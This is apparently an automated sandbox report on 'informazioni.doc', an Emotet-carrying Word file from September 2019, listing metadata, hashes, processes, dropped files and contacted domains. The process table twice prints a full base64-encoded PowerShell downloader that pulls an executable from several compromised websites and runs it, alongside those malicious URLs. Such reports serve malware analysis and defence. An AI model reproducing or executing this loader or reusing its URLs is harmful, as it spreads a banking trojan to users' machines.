File name: | informazioni.doc |
Full analysis: | https://app.any.run/tasks/8d103092-d733-4bde-9c03-cfccabd87ca6 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 26, 2019, 14:17:21 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: August Hoeger, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 24 07:15:00 2019, Last Saved Time/Date: Tue Sep 24 07:15:00 2019, Number of Pages: 1, Number of Words: 86, Number of Characters: 492, Security: 0 |
MD5: | D175760299BCA2928B969E05A84678DA |
SHA1: | E411435DC526E5693AB356DB1D0C62C410BCE852 |
SHA256: | 6C12A45DFB1C4643E89D214888CD7561534D1E69FB941314AB6A40F12D8B65EC |
SSDEEP: | 3072:QzDQw3tj8JshF6Cc86iNSnX662Yzs3UFAYxPxTqf7p1y14o:QzDQw3tj8JshF6Cr6WSnqAs3URPxTqf1 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 577 |
Paragraphs: | 1 |
Lines: | 4 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 492 |
Words: | 86 |
Pages: | 1 |
ModifyDate: | 2019:09:24 06:15:00 |
CreateDate: | 2019:09:24 06:15:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | August Hoeger |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2928 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\informazioni.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2372 | powershell -encod JABCAGIAegB3AHcAcABwAHcAPQAnAFgAbQByAHYAMwA4AHMAMwAnADsAJABaAGkAcwB3AHoAZAAgAD0AIAAnADQANwA1ACcAOwAkAFMAagB6AGEAMABjAD0AJwBUAGgAcQBhADMAYwA1AGQAJwA7ACQARAAzAHcAMQByAGwAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoAaQBzAHcAegBkACsAJwAuAGUAeABlACcAOwAkAEUAZAB6AHAAdgB6ADcAPQAnAEkAawA2AHUAdwBsAGQAJwA7ACQAWAA0AGoAawBqADkAbgBoAD0AJgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABuAEUAVAAuAFcAZQBCAGMAbABJAEUATgBUADsAJABFAGwANAA5AGsANgA9ACcAaAB0AHQAcABzADoALwAvAGIAaAB1AGIAYQBuAGUAcwB3AGEAcgBhAG0AYgB1AGwAYQBuAGMAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHQAZwAzAHAAMgAwAC8AQABoAHQAdABwAHMAOgAvAC8AaQBuAGQAbwBuAGUAcwBpAGEAZQB4AHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGEAcgAzADQANgA4AC8AQABoAHQAdABwADoALwAvAHAAdQByAGUAcAByAG8AcABlAHIAdABpAGUAcwBvAGIAeAAuAGMAbwBtAC8AbQBlAG4AdQBzAGEALwBlAGQAdAAyADIAMgAvAEAAaAB0AHQAcAA6AC8ALwBzAGkAZABhAG4AYQBoAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwA2AGQAdABqAHoAcAAyADEANgAxAC8AQABoAHQAdABwAHMAOgAvAC8AcABvAHQAbwByAGUAdABvAGMAcgBlAGEAdABpAHYAZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgA3AC8AJwAuACIAUwBQAEwAYABpAHQAIgAoACcAQAAnACkAOwAkAFcAbABwAGQAMgA4AGgAZgA9ACcASQBqAHoAdAB3AHcAegAyACcAOwBmAG8AcgBlAGEAYwBoACgAJABVADQAYQA2ADkAagBkACAAaQBuACAAJABFAGwANAA5AGsANgApAHsAdAByAHkAewAkAFgANABqAGsAagA5AG4AaAAuACIARABgAE8AYAB3AG4ATABPAGEAZABmAGkATABFACIAKAAkAFUANABhADYAOQBqAGQALAAgACQARAAzAHcAMQByAGwAKQA7ACQATAAzADQAMQAxADgANgA9ACcAUQBwAHAAbAAwAGkAOQBoACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQARAAzAHcAMQByAGwAKQAuACIAbABFAG4ARwBgAFQASAAiACAALQBnAGUAIAAyADIAMQA2ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAGAAQQByAHQAIgAoACQARAAzAHcAMQByAGwAKQA7ACQAUwBmAHoAdgBqAHQAPQAnAFQAdwB3AGsAbAAwACcAOwBiAHIAZQBhAGsAOwAkAFkAbwBjAHUAMwBzAHMAPQAnAFEAegBvAGYAcABmAHYAcAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABHADMAOQBoADgAcAA9ACcATQB6ADYANQBiAHoAagAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3264 | powershell -encod JABCAGIAegB3AHcAcABwAHcAPQAnAFgAbQByAHYAMwA4AHMAMwAnADsAJABaAGkAcwB3AHoAZAAgAD0AIAAnADQANwA1ACcAOwAkAFMAagB6AGEAMABjAD0AJwBUAGgAcQBhADMAYwA1AGQAJwA7ACQARAAzAHcAMQByAGwAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoAaQBzAHcAegBkACsAJwAuAGUAeABlACcAOwAkAEUAZAB6AHAAdgB6ADcAPQAnAEkAawA2AHUAdwBsAGQAJwA7ACQAWAA0AGoAawBqADkAbgBoAD0AJgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABuAEUAVAAuAFcAZQBCAGMAbABJAEUATgBUADsAJABFAGwANAA5AGsANgA9ACcAaAB0AHQAcABzADoALwAvAGIAaAB1AGIAYQBuAGUAcwB3AGEAcgBhAG0AYgB1AGwAYQBuAGMAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHQAZwAzAHAAMgAwAC8AQABoAHQAdABwAHMAOgAvAC8AaQBuAGQAbwBuAGUAcwBpAGEAZQB4AHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGEAcgAzADQANgA4AC8AQABoAHQAdABwADoALwAvAHAAdQByAGUAcAByAG8AcABlAHIAdABpAGUAcwBvAGIAeAAuAGMAbwBtAC8AbQBlAG4AdQBzAGEALwBlAGQAdAAyADIAMgAvAEAAaAB0AHQAcAA6AC8ALwBzAGkAZABhAG4AYQBoAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwA2AGQAdABqAHoAcAAyADEANgAxAC8AQABoAHQAdABwAHMAOgAvAC8AcABvAHQAbwByAGUAdABvAGMAcgBlAGEAdABpAHYAZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgA3AC8AJwAuACIAUwBQAEwAYABpAHQAIgAoACcAQAAnACkAOwAkAFcAbABwAGQAMgA4AGgAZgA9ACcASQBqAHoAdAB3AHcAegAyACcAOwBmAG8AcgBlAGEAYwBoACgAJABVADQAYQA2ADkAagBkACAAaQBuACAAJABFAGwANAA5AGsANgApAHsAdAByAHkAewAkAFgANABqAGsAagA5AG4AaAAuACIARABgAE8AYAB3AG4ATABPAGEAZABmAGkATABFACIAKAAkAFUANABhADYAOQBqAGQALAAgACQARAAzAHcAMQByAGwAKQA7ACQATAAzADQAMQAxADgANgA9ACcAUQBwAHAAbAAwAGkAOQBoACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQARAAzAHcAMQByAGwAKQAuACIAbABFAG4ARwBgAFQASAAiACAALQBnAGUAIAAyADIAMQA2ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAGAAQQByAHQAIgAoACQARAAzAHcAMQByAGwAKQA7ACQAUwBmAHoAdgBqAHQAPQAnAFQAdwB3AGsAbAAwACcAOwBiAHIAZQBhAGsAOwAkAFkAbwBjAHUAMwBzAHMAPQAnAFEAegBvAGYAcABmAHYAcAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABHADMAOQBoADgAcAA9ACcATQB6ADYANQBiAHoAagAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4D71.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B12C01D0.wmf | wmf | |
MD5:F2909DD2AE48AAE075B6674418EBD38C | SHA256:5BC206D5B05AE5978D7824AA97437B4C1F28A64F0867BF035BC1C13202814BFF | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A5E646.wmf | wmf | |
MD5:9CF716E15B96AF4E39533EA0485E8A11 | SHA256:EB8A7A76389C298EFA76C77CE877A4531DF900A0CD03732CB2999280A1C0BEDF | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:0A718F45D46806D1582CCBAEC32F9280 | SHA256:D42C1977F6FE2933E07E739C3F164E9E6A5044AB10FB81B41A719ED3D9C105A9 | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E73CB05A.wmf | wmf | |
MD5:44ACBA25F8039ADCB8E6C51C6B2A037E | SHA256:B7E7D22060705DA44AE7752A1F100DBD4E299432E4FA9350715BB6F0EECC7E44 | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:0F0C08535A64B51F025E968156938DCB | SHA256:5D034F9BE7A28E3BC52FB7F0AB9CCC128625A6973977286B895AF12E5E2283A0 | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$formazioni.doc | pgc | |
MD5:BDF91064B501F726AAAF96A29BC68842 | SHA256:95991919D2D8E4A4BC15D504099738FCE7D8B0AE1656D6DAA55F221FD73729C8 | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\203A2978.wmf | wmf | |
MD5:D23619770FE324ABFB2DC73CD256E07E | SHA256:B437550538A3FFFE02D4222F2AA7828AD32FC60F903676FB5933DFA6B721D4C0 | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA97DD6D.wmf | wmf | |
MD5:6FBBA24FF99EF1D78E29A8E2A75EA264 | SHA256:32339C7ADD36D28D12FDFED346D4F9C5F0CC2ED3049C86A66E367C00164E7E36 | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC4D585E.wmf | wmf | |
MD5:25FAD3EA2C8039A197BFC38086329F6C | SHA256:6F062C013B6FAC418B1688ADD35EA433173232C3120E709B383C9D220A0E3B6F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2372 | powershell.exe | GET | 404 | 50.62.198.70:80 | http://purepropertiesobx.com/menusa/edt222/ | US | xml | 345 b | malicious |
2372 | powershell.exe | GET | 404 | 132.148.237.202:80 | http://sidanah.com/wp-admin/6dtjzp2161/ | US | xml | 345 b | malicious |
3264 | powershell.exe | GET | 404 | 132.148.237.202:80 | http://sidanah.com/wp-admin/6dtjzp2161/ | US | xml | 345 b | malicious |
3264 | powershell.exe | GET | 404 | 50.62.198.70:80 | http://purepropertiesobx.com/menusa/edt222/ | US | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2372 | powershell.exe | 50.62.198.70:80 | purepropertiesobx.com | GoDaddy.com, LLC | US | suspicious |
3264 | powershell.exe | 50.62.198.70:80 | purepropertiesobx.com | GoDaddy.com, LLC | US | suspicious |
3264 | powershell.exe | 167.71.197.111:443 | indonesiaexp.com | — | US | unknown |
3264 | powershell.exe | 173.214.180.193:443 | bhubaneswarambulance.com | KVCHOSTING.COM LLC | US | malicious |
2372 | powershell.exe | 167.71.197.111:443 | indonesiaexp.com | — | US | unknown |
2372 | powershell.exe | 132.148.237.202:80 | sidanah.com | GoDaddy.com, LLC | US | unknown |
2372 | powershell.exe | 173.214.180.193:443 | bhubaneswarambulance.com | KVCHOSTING.COM LLC | US | malicious |
3264 | powershell.exe | 132.148.237.202:80 | sidanah.com | GoDaddy.com, LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
bhubaneswarambulance.com |
| malicious |
indonesiaexp.com |
| unknown |
purepropertiesobx.com |
| malicious |
sidanah.com |
| malicious |
potoretocreative.com |
| unknown |